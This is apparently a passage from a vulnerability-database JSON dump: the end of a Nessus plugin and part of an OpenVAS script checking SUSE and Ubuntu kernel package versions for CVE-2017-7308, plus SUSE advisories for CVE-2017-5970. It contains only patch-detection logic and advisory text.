https://www.suse.com/support/update/announcement/2017/suse-su-20171302-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b54e7c08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-764=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-764=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET packet_set_ring Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_66-default-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_66-xen-4-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-03-20T23:16:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "edition": 1, "description": "This update for the Linux Kernel 3.12.60-52_54 fixes one issue.\n\n The following security bug was fixed:\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed attackers to cause a\n denial of service (system crash) via (1) an application that made\n crafted system calls or possibly (2) IPv4 traffic with invalid IP\n options (bsc#1025013).\n\n", "modified": "2017-03-21T00:09:52", "published": "2017-03-21T00:09:52", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00024.html", "id": "SUSE-SU-2017:0767-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 15 for SLE 12 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-03-21T01:16:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "edition": 1, "description": "This update for the Linux Kernel 3.12.60-52_57 fixes one issue.\n\n The following security bug was fixed:\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed attackers to cause a\n denial of service (system crash) via (1) an application that made\n crafted system calls or possibly (2) IPv4 traffic with invalid IP\n options (bsc#1025013).\n\n", "modified": "2017-03-21T00:11:29", "published": "2017-03-21T00:11:29", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00033.html", "id": "SUSE-SU-2017:0770-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 16 for SLE 12 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-03-20T23:16:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "edition": 1, "description": "This update for the Linux Kernel 3.12.60-52_49 fixes one issue.\n\n The following security bug was fixed:\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed attackers to cause a\n denial of service (system crash) via (1) an application that made\n crafted system calls or possibly (2) IPv4 traffic with invalid IP\n options (bsc#1025013).\n\n", "modified": "2017-03-21T00:11:04", "published": "2017-03-21T00:11:04", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00025.html", "id": "SUSE-SU-2017:0769-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 14 for SLE 12 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-02-20T15:00:05", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "edition": 1, "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to fix the following\n two issues:\n\n - CVE-2017-5970: Remote attackers could have potentially caused a denial\n of service by sending bad IP options on a socket (bsc#1024938)\n - Fix a regression in MD RAID1 which could have caused wrong data to be\n read (bsc#1020048)\n\n", "modified": "2017-02-20T15:10:18", "published": "2017-02-20T15:10:18", "id": "SUSE-SU-2017:0517-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00033.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-03-20T23:16:44", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "edition": 1, "description": "This update for the Linux Kernel 3.12.55-52_45 fixes one issue.\n\n The following security bug was fixed:\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed attackers to cause a\n denial of service (system crash) via (1) an application that made\n crafted system calls or possibly (2) IPv4 traffic with invalid IP\n options (bsc#1025013).\n\n", "modified": "2017-03-21T00:07:44", "published": "2017-03-21T00:07:44", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00018.html", "id": "SUSE-SU-2017:0759-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 13 for SLE 12 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-03-20T23:16:44", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "edition": 1, "description": "This update for the Linux Kernel 4.4.21-69 fixes several issues.\n\n The following security bug was fixed:\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed attackers to cause a\n denial of service (system crash) via (1) an application that made\n crafted system calls or possibly (2) IPv4 traffic with invalid IP\n options (bsc#1025013).\n\n The following non-security bug was fixed:\n - Fix for a &quot;Data miscompare on a read&quot; which was observed during the\n rebuilding of degraded MDRAID VDs. (bsc#1025254)\n\n", "modified": "2017-03-21T00:10:23", "published": "2017-03-21T00:10:23", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00023.html", "id": "SUSE-SU-2017:0768-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 0 for SLE 12 SP2 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-03-20T23:16:44", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "edition": 1, "description": "This update for the Linux Kernel 3.12.67-60_64_18 fixes several issues.\n\n The following security bug was fixed:\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed attackers to cause a\n denial of service (system crash) via (1) an application that made\n crafted system calls or possibly (2) IPv4 traffic with invalid IP\n options (bsc#1025013).\n\n The following non-security bug was fixed:\n - Fix for a &quot;Data miscompare on a read&quot; which was observed during the\n rebuilding of degraded MDRAID VDs. (bsc#1025254)\n\n", "modified": "2017-03-21T00:12:59", "published": "2017-03-21T00:12:59", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00028.html", "id": "SUSE-SU-2017:0773-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 9 for SLE 12 SP1 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-03-21T03:16:45", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "edition": 1, "description": "This update for the Linux Kernel 4.4.38-93 fixes several issues.\n\n The following security bug was fixed:\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed attackers to cause a\n denial of service (system crash) via (1) an application that made\n crafted system calls or possibly (2) IPv4 traffic with invalid IP\n options (bsc#1025013).\n\n The following non-security bug was fixed:\n - Fix for a &quot;Data miscompare on a read&quot; which was observed during the\n rebuilding of degraded MDRAID VDs. (bsc#1025254)\n\n", "modified": "2017-03-21T03:09:24", "published": "2017-03-21T03:09:24", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00039.html", "id": "SUSE-SU-2017:0779-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 4 for SLE 12 SP2 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-03-20T23:16:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "edition": 1, "description": "This update for the Linux Kernel 3.12.60-52_63 fixes one issue.\n\n The following security bug was fixed:\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed attackers to cause a\n denial of service (system crash) via (1) an application that made\n crafted system calls or possibly (2) IPv4 traffic with invalid IP\n options (bsc#1025013).\n\n", "modified": "2017-03-21T00:09:37", "published": "2017-03-21T00:09:37", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00022.html", "id": "SUSE-SU-2017:0766-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 18 for SLE 12 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-03-20T23:16:44", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "edition": 1, "description": "This update for the Linux Kernel 3.12.62-60_62 fixes one issue.\n\n The following security bug was fixed:\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed attackers to cause a\n denial of service (system crash) via (1) an application that made\n crafted system calls or possibly (2) IPv4 traffic with invalid IP\n options (bsc#1025013).\n\n", "modified": "2017-03-21T00:07:59", "published": "2017-03-21T00:07:59", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00019.html", "id": "SUSE-SU-2017:0760-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 7 for SLE 12 SP1 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:38:05", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7308"], "description": "USN-3256-1 fixed vulnerabilities in the Linux kernel for Ubuntu \n14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. This update provides \nthe corresponding updates for the Linux Hardware Enablement (HWE) \nkernel for each of the respective prior Ubuntu LTS releases.\n\nAndrey Konovalov discovered that the AF_PACKET implementation in the Linux \nkernel did not properly validate certain block-size data. A local attacker \ncould use this to cause a denial of service (system crash).", "edition": 5, "modified": "2017-04-05T00:00:00", "published": "2017-04-05T00:00:00", "id": "USN-3256-2", "href": "https://ubuntu.com/security/notices/USN-3256-2", "title": "Linux kernel (HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:38:19", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7308"], "description": "Andrey Konovalov discovered that the AF_PACKET implementation in the Linux \nkernel did not properly validate certain block-size data. A local attacker \ncould use this to cause a denial of service (system crash).", "edition": 7, "modified": "2017-04-05T00:00:00", "published": "2017-04-05T00:00:00", "id": "USN-3256-1", "href": "https://ubuntu.com/security/notices/USN-3256-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7308"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-04-06T00:00:00", "id": "OPENVAS:1361412562310843127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843127", "type": "openvas", "title": "Ubuntu Update for linux USN-3256-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3256-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843127\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-06 06:33:10 +0200 (Thu, 06 Apr 2017)\");\n script_cve_id(\"CVE-2017-7308\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3256-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Andrey Konovalov discovered that the\n AF_PACKET implementation in the Linux kernel did not properly validate certain\n block-size data. A local attacker could use this to cause a denial of service\n (system crash).\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3256-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3256-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-116-generic\", ver:\"3.13.0-116.163\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-116-generic-lpae\", ver:\"3.13.0-116.163\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-116-lowlatency\", ver:\"3.13.0-116.163\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-116-powerpc-e500\", ver:\"3.13.0-116.163\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-116-powerpc-e500mc\", ver:\"3.13.0-116.163\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-116-powerpc-smp\", ver:\"3.13.0-116.163\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-116-powerpc64-smp\", ver:\"3.13.0-116.163\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.116.126\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.116.126\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.116.126\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.116.126\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.116.126\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.116.126\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.116.126\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-1033-raspi2\", ver:\"4.8.0-1033.36\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-46-generic\", ver:\"4.8.0-46.49\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-46-generic-lpae\", ver:\"4.8.0-46.49\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-46-lowlatency\", ver:\"4.8.0-46.49\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-46-powerpc-e500mc\", ver:\"4.8.0-46.49\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-46-powerpc-smp\", ver:\"4.8.0-46.49\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-46-powerpc64-emb\", ver:\"4.8.0-46.49\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.8.0.46.58\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.8.0.46.58\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.8.0.46.58\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.8.0.46.58\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.8.0.46.58\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.8.0.46.58\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.8.0.1033.37\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-126-generic\", ver:\"3.2.0-126.169\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-126-generic-pae\", ver:\"3.2.0-126.169\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-126-highbank\", ver:\"3.2.0-126.169\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-126-omap\", ver:\"3.2.0-126.169\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-126-powerpc-smp\", ver:\"3.2.0-126.169\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-126-powerpc64-smp\", ver:\"3.2.0-126.169\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-126-virtual\", ver:\"3.2.0-126.169\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1504-omap4\", ver:\"3.2.0-1504.131\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.2.0.126.141\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-pae\", ver:\"3.2.0.126.141\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-highbank\", ver:\"3.2.0.126.141\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-omap\", ver:\"3.2.0.126.141\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-omap4\", ver:\"3.2.0.1504.99\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.2.0.126.141\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.2.0.126.141\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-virtual\", ver:\"3.2.0.126.141\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1010-gke\", ver:\"4.4.0-1010.10\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1013-aws\", ver:\"4.4.0-1013.22\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1052-raspi2\", ver:\"4.4.0-1052.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1055-snapdragon\", ver:\"4.4.0-1055.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-generic\", ver:\"4.4.0-72.93\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-generic-lpae\", ver:\"4.4.0-72.93\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-lowlatency\", ver:\"4.4.0-72.93\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-72-powerpc-e500mc\", ver:\"4.4.0-72.93\", rls:\"UBUNTU16.04 